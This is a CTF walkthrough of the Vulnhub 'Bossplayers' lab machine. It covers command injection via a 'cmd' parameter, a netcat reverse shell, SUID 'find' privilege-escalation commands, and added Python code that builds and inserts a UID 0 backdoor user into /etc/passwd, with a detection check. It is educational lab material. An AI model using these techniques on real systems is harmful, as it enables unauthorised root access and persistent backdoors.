Bossplayers CTF - Walkthrough

Mr. Robot
Oct 4, 2019 · 5 min read

Finally, I’m back. I was doing Virtual Hacking Labs for 3 months, but I’m back now. I’ll finish my reports soon and continue solving Vulnhub and Hack The Box machines. I know, I missed many machines. I decided to start with the latest and greatest. Let’s get started!

Description from Vulnhub:

Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF’s. It should take around 30 minutes to root.

You may have issues using VMware.

Scanning

My usual Nmap scan runs script scanning and version detection against all ports. Only 2 ports were open in the result.

I quickly checked the OpenSSH version for publicly available exploits, but I didn't find anything. This version is reasonably safe, but it's good practice to double-check everything. Next I looked at what port 80 was about. Let's see the robots.txt file.

Uhh, okay! That's definitely not the way in. I went back and used the Inspect Element tools to look at the site's HTML source. There was an interesting comment at the bottom of the file.

I assumed the comment was base64 encoded. After decoding it three times, I finally got a file name as the result.
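Decoding "until it stops being base64" is a common CTF chore, so here is a small helper for it. This is an added example, not code from the original post; the sample comment is constructed inline (a placeholder file name wrapped three times, with the trailing newlines that piping through `base64` produces), and the real comment from the machine is not reproduced.

```python
import base64
import binascii


def decode_nested_base64(blob, max_rounds=10):
    """Peel base64 layers off `blob` until the result is no longer valid base64
    or no longer decodes to printable text. Returns (plaintext, layers_removed)."""
    current = blob.strip()
    rounds = 0
    while rounds < max_rounds:
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break  # not base64 any more: we have reached the payload
        try:
            text = decoded.decode("ascii").strip()
        except UnicodeDecodeError:
            break  # binary garbage: the previous layer was the payload
        if not text or not text.isprintable():
            break
        current, rounds = text, rounds + 1
    return current, rounds


def make_sample(name="todo_list.php", layers=3):
    """Constructed sample: `name` wrapped `layers` times the way
    `echo name | base64 | base64 | base64` would produce it (newlines included)."""
    data = name.encode() + b"\n"
    for _ in range(layers):
        data = base64.b64encode(data) + b"\n"
    return data.decode()


# Placeholder stand-in for the HTML comment found on the page (constructed, not the real one).
SAMPLE_COMMENT = make_sample()

if __name__ == "__main__":
    print(decode_nested_base64(SAMPLE_COMMENT))
```

The `validate=True` flag is what makes the loop terminate cleanly: the plain file name contains characters outside the base64 alphabet, so the decoder refuses it instead of silently producing garbage, and the printable-text check catches the rare case where a plaintext happens to look like valid base64.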

We are slowly progressing. The page looked like some kind of to-do list for the system administrator. I focused on the unchecked items, which suggested that a ping command and a privilege escalation vulnerability are probably present on the target system. It's our job to find them.

I fired up Burp Suite to capture the request and find this mysterious ping command. I have to admit, this was the hardest part for me and involved a lot of guesswork. I tried ping, ip, command and similar parameter names. Finally, I tried cmd and it worked: the response contained the output of the id command. I didn't even have to supply an IP address.

My next move was to turn this remote code execution into a reverse shell. I chose the simplest netcat reverse shell command. Note that you have to URL encode the command, otherwise it won't work. No response (the request hangs while the shell is connected), good sign!

Sure enough, I got a connection back on my reverse shell listener as the low-privileged user www-data.

Privilege Escalation

It was time for more enumeration. I usually run some basic commands before doing an extensive enumeration with shell scripts: I look for sensitive files, check permissions, list the allowed (and forbidden) sudo commands for the invoking user, etc. I wasn't able to do the last one because sudo is not installed on the system. On the other hand, I listed the files with the SUID bit set and noticed a binary that should not be there: the find command had both the SUID and SGID bits set, which is very bad.

We can't use the sudo find . -exec /bin/bash \; trick to spawn a root shell because sudo isn't there, so we have to be a bit more clever. The find command can execute Linux commands on every file that matches its search criteria, and because the binary is SUID those commands run with root's effective UID. (A SUID find would also spawn a root shell directly with find . -exec /bin/sh -p \; since -p stops the shell from dropping the elevated effective UID; the route below works through -exec on individual files instead.) Let me show you what I mean: we can read the /etc/shadow file, which is owned by root.

Basically, we already have root-level read and write access, which is why I didn't bother cracking the hashes. My idea was to add a new entry with UID 0 to the /etc/passwd file. Note that I was still in a shell without a proper TTY, which made this significantly harder; sometimes you don't have the opportunity or time to upgrade your shell. First, I created a salted password hash with perl. I chose supersecret for the password and salt for the salt. On the following screenshot, you can also see the complete line for the new r00t user.

I couldn't screenshot the steps (lots of garbage output), so I'll try to explain the process. First, I executed find /etc -name passwd -exec vi {} \; which opened a file that is not /etc/passwd. You might ask, what?! The reason is that find searches recursively by default, and I couldn't prevent this on the target system. (Giving the file itself as the starting point, find /etc/passwd -exec vi {} \;, or adding -maxdepth 1, restricts the match to that one file.) So the previous command opened /etc/cron.daily/passwd and /etc/pam.d/passwd before /etc/passwd; they unfortunately matched the search criteria too. I just typed :q 2 times to close the first 2 files. After that, I hit i to enter INSERT mode, pasted my crafted user line, pressed Esc to leave INSERT mode and closed the file with :wq!. If you know vi, this is nothing new to you. Let's see the new entry in the /etc/passwd file.

We did it! We have our user at the top of the file. All we have to do is switch to this user with su, using the supersecret password we set. Now we have root privileges and, with that, full system compromise. Finally, I printed out the flag, which was also base64 encoded.
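A malformed line in /etc/passwd is the classic way to turn a near-root foothold into a locked-out box, and with no TTY you get one shot at pasting it. The following is an added example (not the author's code) covering the procedure from the privilege escalation steps above: it builds the UID 0 entry, sanity-checks the line before it is written, prepends it to a passwd file the way the walkthrough does, and finally runs the check a defender would use to spot exactly this backdoor. The hash value is a constructed placeholder; the real one comes from perl's crypt() as on the page (perl -le 'print crypt("supersecret", "salt")'), and the sample passwd content is constructed too.

```python
import re

# Constructed sample /etc/passwd content (not from the target machine).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)

# Placeholder in the shape of an MD5-crypt hash. Substitute the output of
# perl's crypt() or `openssl passwd`; this string is constructed for the demo.
PLACEHOLDER_HASH = "$1$salt$" + "A" * 22

# Conservative user-name rule (lowercase start, no ':' or whitespace).
NAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def check_passwd_entry(line):
    """Return None if `line` is a usable passwd entry, else the reason it is not."""
    if "\n" in line or "\r" in line:
        return "entry contains a line break"
    fields = line.split(":")
    if len(fields) != 7:
        return f"expected 7 colon-separated fields, got {len(fields)}"
    name, pw, uid, gid, _gecos, home, shell = fields
    if not NAME_RE.match(name):
        return "invalid user name"
    if not pw or pw in ("x", "*", "!"):
        # 'x' defers to /etc/shadow (where our user has no entry); '*' and '!' are locked.
        return "password field holds no usable hash, su would fail"
    if not uid.isdigit() or not gid.isdigit():
        return "uid and gid must be numeric"
    if not home.startswith("/") or not shell.startswith("/"):
        return "home and shell must be absolute paths"
    return None


def build_passwd_entry(username, password_hash, uid=0, gid=0,
                       gecos="root", home="/root", shell="/bin/bash"):
    """Assemble a UID 0 entry and refuse to return one that would not parse."""
    entry = f"{username}:{password_hash}:{uid}:{gid}:{gecos}:{home}:{shell}"
    problem = check_passwd_entry(entry)
    if problem:
        raise ValueError(problem)
    return entry


def insert_entry(passwd_text, entry):
    """Prepend the entry (the walkthrough puts the new user at the top),
    refusing to create a duplicate user name."""
    new_name = entry.split(":")[0]
    for line in passwd_text.splitlines():
        if line.split(":")[0] == new_name:
            raise ValueError(f"user {new_name} already exists")
    return entry + "\n" + passwd_text


def uid0_accounts(passwd_text):
    """Defender-side check: names of all UID 0 accounts, sorted. Anything
    other than 'root' is a backdoor until proven otherwise."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0":
            names.append(fields[0])
    return sorted(names)


if __name__ == "__main__":
    entry = build_passwd_entry("r00t", PLACEHOLDER_HASH)
    print(entry)
    print(uid0_accounts(insert_entry(SAMPLE_PASSWD, entry)))
```

The same uid0_accounts check, run against /etc/passwd from cron or a file-integrity tool, is the cheapest detection for this technique; the SUID bit on find is the finding that should have prevented it in the first place.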


InfoSec Adventures

Adventures in the world of IT Security.


Written by

Mr. Robot

Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.
